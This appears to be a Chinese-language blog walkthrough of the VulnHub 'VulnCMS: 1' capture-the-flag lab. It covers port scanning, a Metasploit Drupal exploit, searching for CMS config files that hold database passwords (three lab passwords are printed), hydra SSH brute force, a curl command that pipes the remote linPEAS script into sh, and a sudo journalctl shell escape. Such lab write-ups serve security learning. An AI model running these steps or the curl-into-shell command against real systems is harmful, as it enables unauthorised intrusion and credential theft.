vulnhub之 VulnCMS: 1

Posted 2021-09-03 我带的我们

                                                      VulnCMS: 1

信息搜集

首先进行ip扫描

看看开启了哪些端口

对端口进行扫描

 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000

获取shell

在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal，于是在msf上进行查看

我尝试了第八个，可是不行

 

于是我来测试最后一个

 search drupal

好像可以

输入shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

首先查看所有的wordpress

find / -type d -name  "wordpress" 2>/dev/null

于是在/html/wordpress/public_html 发现了wordpress数据库的用户名密码

find / -type d -name  "joomla" 2>/dev/null

于是找到了joomla数据库的用户名密码

我在查看INSTALL.sqlite.txt他告诉我了 drupal的用户名密码所在位置

于是我在/VAR/WWW//html/drupal/sites/default发现了用户名

 这是所有数据库的用户名和密码

user	passwd
drupal_admin	p@$$_C!rUP@!_cM5
joomla_admin	j00m1_@_dBpA$$
wp_admin	UUs3R_C!B@p@55

于是进入到数据库

对其进行解密，无效

在查看joomla数据库中的email特别像密码

在home目录下有三个用户

于是进行暴力破解 （用户名放在user.txt 密码放在passwd.txt）

hydra -L user.txt  -P passwd.txt   ssh://192.168.181.146

于是获得了用户名密码，进行ssh登录

登录成功

于是获得第一个flag

由于我无法查看其他目录，要重新定位

python3 -c 'import os; os.system("/bin/bash");'

提权

发现elliot用户无法提权

于是对tyrell进行密码破解，首先运行/linpeas.sh 输出为1.txt

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh > 1.txt（要开加速器）

获得了用户名密码，进行ssh登录

sudo -l 提示/bin/journalctl进行提权

sudo journalctl

!/bin/sh

获得最终flag